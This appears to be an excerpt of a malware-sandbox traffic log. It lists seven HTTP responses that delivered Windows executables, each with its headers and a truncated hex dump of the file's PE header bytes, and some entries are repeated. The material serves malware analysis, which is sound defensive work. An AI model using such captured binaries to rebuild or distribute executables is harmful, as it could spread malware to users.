Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 02 Oct 2024 07:41:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 02 Oct 2024 07:41:31 GMTContent-Type: application/octet-streamContent-Length: 391072Last-Modified: Tue, 01 Oct 2024 13:44:41 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66fbfcc9-5f7a0"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 20 f8 fb 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 a0 05 00 00 06 00 00 00 00 00 00 ee be 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 a2 22 06 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 be 05 00 53 00 00 00 00 c0 05 00 42 02 00 00 00 00 00 00 00 00 00 00 78 d1 05 00 28 26 00 00 00 e0 05 00 0c 00 00 00 60 bd 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 9e 05 00 00 20 00 00 00 a0 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 c0 05 00 00 04 00 00 00 a2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 05 00 00 02 00 00 00 a6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 be 05 00 00 00 00 00 48 00 00 00 02 00 05 00 40 ab 05 00 20 12 00 00 03 00 02 00 12 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 db 1f 5b 28 3c d4 73 54 10 77 2f a8 15 ea 9c c3 cd 78 7e 49 a5 1e d7 0f f4 a7 54 1e ec 97 54 35 51 3e d1 7a b9 93 2a f6 a2 f1 a1 62 fc 53 d6 a3 2f 8b 8d 87 8b 32 45 99 77 cb 3e ae a1 2f 8a 64 97 aa 74 5f f0 73 bf b2 97 bd 8e cf 07 88 6f 3e bd e6 ab cd b7 13 b9 e4 eb fd e3 0a ae f5 f0 8f b2 55 56 93 53 f9 99 0d dd bc ef 61 35 eb e4 4a 4b bc b1 bf a2 59 85 77 2e 8e 08 af 13 7f 23 89 17 ab df b4 73 e5 a8 22 b3 f6 7f e6 84 2d 64 04 08 2d 37 8d 9d 61 76 bc f6 6e d7 92 5c d4 09 fb 07 5d a9 df 1e 1e 8d 2e 9b 0a 8f b6 ee c3 4c 1d 14 ea 74 c9 13 ee 3a 32 6f 31 19 21 ad 12 c2 86 c1 f4 2a af fc 71 39 5f 4f b0 fd 06 0b a1 91 4b b3 5e 8d e1 f4 13 22 d3 c8 c3 29 30 da fe 2e 33 b0 92 24 ed 35 89 2c b5 8a 7d cc ff eb e0 9a 33 63 78 f5 7a b3 b5 ab 09 12 32 49 7d c7 fc 17 8f e1 dd d8 98 49 01 65 0a c9 1d 24 f1 84 98 20 2e d2 a0 8f bd d3 56 20 c3 ef 4f 47 80 bb f7 55 61 1e 24 2b d9 0e ef 25 5c 00 42 2d 9a 55 8
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 02 Oct 2024 07:41:31 GMTContent-Type: application/octet-streamContent-Length: 391072Last-Modified: Tue, 01 Oct 2024 13:44:41 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66fbfcc9-5f7a0"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 20 f8 fb 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 a0 05 00 00 06 00 00 00 00 00 00 ee be 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 a2 22 06 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 be 05 00 53 00 00 00 00 c0 05 00 42 02 00 00 00 00 00 00 00 00 00 00 78 d1 05 00 28 26 00 00 00 e0 05 00 0c 00 00 00 60 bd 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 9e 05 00 00 20 00 00 00 a0 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 c0 05 00 00 04 00 00 00 a2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 05 00 00 02 00 00 00 a6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 be 05 00 00 00 00 00 48 00 00 00 02 00 05 00 40 ab 05 00 20 12 00 00 03 00 02 00 12 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 db 1f 5b 28 3c d4 73 54 10 77 2f a8 15 ea 9c c3 cd 78 7e 49 a5 1e d7 0f f4 a7 54 1e ec 97 54 35 51 3e d1 7a b9 93 2a f6 a2 f1 a1 62 fc 53 d6 a3 2f 8b 8d 87 8b 32 45 99 77 cb 3e ae a1 2f 8a 64 97 aa 74 5f f0 73 bf b2 97 bd 8e cf 07 88 6f 3e bd e6 ab cd b7 13 b9 e4 eb fd e3 0a ae f5 f0 8f b2 55 56 93 53 f9 99 0d dd bc ef 61 35 eb e4 4a 4b bc b1 bf a2 59 85 77 2e 8e 08 af 13 7f 23 89 17 ab df b4 73 e5 a8 22 b3 f6 7f e6 84 2d 64 04 08 2d 37 8d 9d 61 76 bc f6 6e d7 92 5c d4 09 fb 07 5d a9 df 1e 1e 8d 2e 9b 0a 8f b6 ee c3 4c 1d 14 ea 74 c9 13 ee 3a 32 6f 31 19 21 ad 12 c2 86 c1 f4 2a af fc 71 39 5f 4f b0 fd 06 0b a1 91 4b b3 5e 8d e1 f4 13 22 d3 c8 c3 29 30 da fe 2e 33 b0 92 24 ed 35 89 2c b5 8a 7d cc ff eb e0 9a 33 63 78 f5 7a b3 b5 ab 09 12 32 49 7d c7 fc 17 8f e1 dd d8 98 49 01 65 0a c9 1d 24 f1 84 98 20 2e d2 a0 8f bd d3 56 20 c3 ef 4f 47 80 bb f7 55 61 1e 24 2b d9 0e ef 25 5c 00 42 2d 9a 55 8
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 02 Oct 2024 07:42:13 GMTContent-Type: application/octet-streamContent-Length: 391072Last-Modified: Tue, 01 Oct 2024 13:44:41 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66fbfcc9-5f7a0"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 20 f8 fb 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 a0 05 00 00 06 00 00 00 00 00 00 ee be 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 a2 22 06 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 be 05 00 53 00 00 00 00 c0 05 00 42 02 00 00 00 00 00 00 00 00 00 00 78 d1 05 00 28 26 00 00 00 e0 05 00 0c 00 00 00 60 bd 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 9e 05 00 00 20 00 00 00 a0 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 c0 05 00 00 04 00 00 00 a2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 05 00 00 02 00 00 00 a6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 be 05 00 00 00 00 00 48 00 00 00 02 00 05 00 40 ab 05 00 20 12 00 00 03 00 02 00 12 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 db 1f 5b 28 3c d4 73 54 10 77 2f a8 15 ea 9c c3 cd 78 7e 49 a5 1e d7 0f f4 a7 54 1e ec 97 54 35 51 3e d1 7a b9 93 2a f6 a2 f1 a1 62 fc 53 d6 a3 2f 8b 8d 87 8b 32 45 99 77 cb 3e ae a1 2f 8a 64 97 aa 74 5f f0 73 bf b2 97 bd 8e cf 07 88 6f 3e bd e6 ab cd b7 13 b9 e4 eb fd e3 0a ae f5 f0 8f b2 55 56 93 53 f9 99 0d dd bc ef 61 35 eb e4 4a 4b bc b1 bf a2 59 85 77 2e 8e 08 af 13 7f 23 89 17 ab df b4 73 e5 a8 22 b3 f6 7f e6 84 2d 64 04 08 2d 37 8d 9d 61 76 bc f6 6e d7 92 5c d4 09 fb 07 5d a9 df 1e 1e 8d 2e 9b 0a 8f b6 ee c3 4c 1d 14 ea 74 c9 13 ee 3a 32 6f 31 19 21 ad 12 c2 86 c1 f4 2a af fc 71 39 5f 4f b0 fd 06 0b a1 91 4b b3 5e 8d e1 f4 13 22 d3 c8 c3 29 30 da fe 2e 33 b0 92 24 ed 35 89 2c b5 8a 7d cc ff eb e0 9a 33 63 78 f5 7a b3 b5 ab 09 12 32 49 7d c7 fc 17 8f e1 dd d8 98 49 01 65 0a c9 1d 24 f1 84 98 20 2e d2 a0 8f bd d3 56 20 c3 ef 4f 47 80 bb f7 55 61 1e 24 2b d9 0e ef 25 5c 00 42 2d 9a 55 8
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 02 Oct 2024 07:42:23 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 02 Oct 2024 07:42:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 02 Oct 2024 07:42:27 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
